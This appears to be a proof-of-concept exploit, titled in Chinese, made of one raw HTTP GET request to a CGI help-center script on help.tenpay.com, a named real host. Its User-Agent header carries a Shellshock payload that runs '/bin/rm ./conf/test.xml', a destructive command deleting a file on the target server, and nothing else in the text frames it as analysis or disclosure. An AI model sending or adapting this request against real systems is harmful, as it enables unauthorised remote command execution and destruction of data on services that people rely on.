漏洞利用POC:

GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1

Host: help.tenpay.com 

User-Agent: () { :;}; /bin/rm ./conf/test.xml

Accept: */*

Connection: keep-alive